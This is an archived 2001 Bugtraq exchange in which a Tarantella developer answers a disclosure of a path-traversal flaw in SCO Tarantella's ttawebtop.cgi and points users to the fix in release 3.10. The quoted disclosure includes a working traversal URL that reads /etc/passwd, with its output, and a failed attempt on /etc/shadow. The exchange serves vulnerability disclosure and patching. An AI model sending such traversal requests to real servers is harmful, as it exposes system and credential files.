[21102] in bugtraq
Re: SCO Tarantella Remote file read via ttawebtop.cgi
daemon@ATHENA.MIT.EDU (Mike McEwen)
Tue Jun 19 16:10:00 2001
Date: Tue, 19 Jun 2001 15:09:35 +0100
From: Mike McEwen <mikemc@tarantella.com>
To: KF <dotslash@snosoft.com>, BUGTRAQ@securityfocus.com
Message-ID: <20010619150935.A5226@tarantella.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <3B2E37D0.81D9ED9D@snosoft.com>; from dotslash@snosoft.com on Mon, Jun 18, 2001 at 01:18:08PM -0400
On Monday June 18, KF wrote:
> SCO has been notified of this issue.
>
>
> -------- Original Message --------
> Subject: SCO Tarantella Remote file read via ttawebtop.cgi
> Date: Mon, 18 Jun 2001 13:06:41 -0400
> From: KF <dotslash@snosoft.com>
> To: recon@snosoft.com
>
>
> http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd
>
> root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:
> daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/adm:
> lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync
> shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
> halt:x:7:0:halt:/sbin:/sbin/
> ...
>
>
> No perms to shadow...
>
> http://xxx/tarantella/cgi-bin/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/shadow
>
>
> File missing
>
> The following file could not be found:
>
>
> /tarantella/../../../../../../../../../../../../../../../etc/shadow
>
> Please give this information to a Tarantella Administrator.
>
> -KF
This problem was introduced in release 3.01 and was caught during a security
audit and was fixed for our last release (Tarantella 3.10).
It is a problem for releases 3.00 and 3.01 only.
To fix this problem upgrade to 3.10.
Thank you for reporting this problem.
- Mike McEwen
